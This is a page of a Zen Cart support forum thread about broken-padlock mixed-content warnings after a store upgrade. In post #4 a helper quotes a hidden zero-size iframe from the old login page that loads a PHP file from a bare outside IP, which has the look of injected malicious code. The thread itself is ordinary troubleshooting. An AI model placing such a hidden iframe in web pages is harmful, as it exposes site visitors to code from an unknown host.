Page 1 of 3 123 LastLast
Results 1 to 10 of 21
  1. #1
    Join Date
    Dec 2006
    Location
    Ontario
    Posts
    112
    Plugin Contributions
    0

    Default Broken Lock in IE - problems when hosting with servage.net

    I upgraded to 1.5 from 1.36 yesterday. (It went very well). Upgrading got me back into trying to solve a problem thats been on my site for years
    I must be missing a setting somewhere. When my site goes to ssl i get the insecure content warning. In developers tools i can see the offending content. Its my style sheets. logo and a couple of button images. I dont see how I could have hardcoded them. I just cant figure out how to fix it.

    SEC7111: HTTPS security is compromised by http://www.site/onlinenew/includes/templates/custom/css/stylesheet.css

    SEC7111: HTTPS security is compromised by http://www.site/onlinenew/includes/templates/custom/css/stylesheet.css

    SEC7111: HTTPS security is compromised by http://www.site.ca/onlinenew/includes/templates/custom/css/stylesheet_css_buttons.css

    SEC7111: HTTPS security is compromised by http://www.site/onlinenew/includes/templates/custom/css/stylesheet_css_buttons.css

    SEC7111: HTTPS security is compromised by http://www.site/onlinenew/includes/templates/custom/css/print_stylesheet.css

    SEC7111: HTTPS security is compromised by http://www.site/onlinenew/includes/templates/custom/css/print_stylesheet.css

    SEC7111: HTTPS security is compromised by http://www.site/onlinenew/includes/templates/template_default/images/logo.jpg

    SEC7111: HTTPS security is compromised by http://www.site/onlinenew/includes/templates/template_default/buttons/english/button_login.gif

    SEC7111: HTTPS security is compromised by http://www.site/onlinenew/includes/templates/template_default/buttons/english/button_submit.gif

  2. #2
    Join Date
    Jun 2003
    Posts
    33,715
    Plugin Contributions
    0

    Default Re: Broken Lock in IE

    What is your URL?
    Please do not PM for support issues: a private solution doesn't benefit the community.

    Be careful with unsolicited advice via email or PM - Make sure the person you are talking to is a reliable source.

  3. #3
    Join Date
    Dec 2006
    Location
    Ontario
    Posts
    112
    Plugin Contributions
    0

    Default Re: Broken Lock in IE

    Version 1.5 is in a test folder still washington*****pools.ca****/onlinenew

    Ive changed my custom folder to custom1 so it pulls from template-default. no change.

    Swithched to classic template. no change

    Im testing on internet explorer

  4. #4
    Join Date
    Sep 2005
    Location
    Waikato, New Zealand
    Posts
    1,539
    Plugin Contributions
    3

    Default Re: Broken Lock in IE

    On you original site you have this appearing at the bottom of your login page

    note the "src="http://" thats calling an insecure resource on a secure page, and that will cause the padlock to break

    <iframe src="http://81.183.212.241/.kde/index.php" width="0" height="0"></iframe>
    Webzings Design
    Semi retired from Web Design

  5. #5
    Join Date
    Dec 2006
    Location
    Ontario
    Posts
    112
    Plugin Contributions
    0

    Default Re: Broken Lock in IE

    I saw that. But its gone on the new site. Im done with 1.36

  6. #6
    Join Date
    Dec 2006
    Location
    Ontario
    Posts
    112
    Plugin Contributions
    0

    Default Re: Broken Lock in IE

    I went searching thru the showcase shops looking for sites that the ssl works.( I was surprised how many dont use ssl)

    On a site where the ssl works properly about line 15 on the page source is
    <basehref="https://www.the site.com

    On my site it reads
    <basehref="http://www.the site.com

    Not sure why

  7. #7
    Join Date
    Jan 2004
    Posts
    66,373
    Blog Entries
    7
    Plugin Contributions
    274

    Default Re: Broken Lock in IE

    Who is your hosting company?
    Please click Reply below and answer all the questions in the Posting Tips section of that screen.
    .

    Zen Cart - putting the dream of business ownership within reach of anyone!
    Donate to: DrByte directly or to the Zen Cart team as a whole

    Remember: Any code suggestions you see here are merely suggestions. You assume full responsibility for your use of any such suggestions, including any impact ANY alterations you make to your site may have on your PCI compliance.
    Furthermore, any advice you see here about PCI matters is merely an opinion, and should not be relied upon as "official". Official PCI information should be obtained from the PCI Security Council directly or from one of their authorized Assessors.

  8. #8
    Join Date
    Dec 2006
    Location
    Ontario
    Posts
    112
    Plugin Contributions
    0

    Default Re: Broken Lock in IE

    Host is servage.net
    1.36 to 1.5
    upgraded myself with zc. few or no add ons. All modifications are in my custom folder so i can turn them off by changing the template
    Always had the problem since 2006. About once a year it bugs me and I try to figure it out, Ive read a lot of threads on the subject. Most threads say its a server problem.
    I have have quite a few supporty tickets with my host with no solution.
    I dont really know what to ask them?
    Purchased a ssl cert years ago but that didnt work so I went back to shared one.

    Ive been running 1.36 since 2006 and switched to 1.5 yesterday. All has worked really well except for the ssl pages. Oh and since the upgrade my taxes are not being applied to the products.
    1.5 is still in the test folder untill I get the tax thing figured out.
    washington******pools.ca***/onlinenew

  9. #9
    Join Date
    Jan 2004
    Posts
    66,373
    Blog Entries
    7
    Plugin Contributions
    274

    Default Re: Broken Lock in IE

    Yes, it does appear to be a server problem. I recall seeing others complain about odd problems using servage.net ... but I don't recall what exactly those problems were, without doing a search.
    .

    Zen Cart - putting the dream of business ownership within reach of anyone!
    Donate to: DrByte directly or to the Zen Cart team as a whole

    Remember: Any code suggestions you see here are merely suggestions. You assume full responsibility for your use of any such suggestions, including any impact ANY alterations you make to your site may have on your PCI compliance.
    Furthermore, any advice you see here about PCI matters is merely an opinion, and should not be relied upon as "official". Official PCI information should be obtained from the PCI Security Council directly or from one of their authorized Assessors.

  10. #10
    Join Date
    Jan 2004
    Posts
    66,373
    Blog Entries
    7
    Plugin Contributions
    274

    Default Re: Broken Lock in IE

    Try this ssltest script, and report back its output:
    http://www.zen-cart.com/forum/showpo...87&postcount=4
    .

    Zen Cart - putting the dream of business ownership within reach of anyone!
    Donate to: DrByte directly or to the Zen Cart team as a whole

    Remember: Any code suggestions you see here are merely suggestions. You assume full responsibility for your use of any such suggestions, including any impact ANY alterations you make to your site may have on your PCI compliance.
    Furthermore, any advice you see here about PCI matters is merely an opinion, and should not be relied upon as "official". Official PCI information should be obtained from the PCI Security Council directly or from one of their authorized Assessors.

 

 
Page 1 of 3 123 LastLast

Similar Threads

  1. Authorize.net Communications Problems with GoDaddy Hosting
    By ctrules in forum General Questions
    Replies: 8
    Last Post: 22 Jul 2010, 06:11 PM
  2. Replies: 26
    Last Post: 4 Oct 2008, 06:09 AM
  3. Anybody use servage.net for hosting
    By IDW in forum General Questions
    Replies: 1
    Last Post: 23 Dec 2006, 05:39 AM

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  
disjunctive-egg
Zen-Cart, Internet Selling Services, Klamath Falls, OR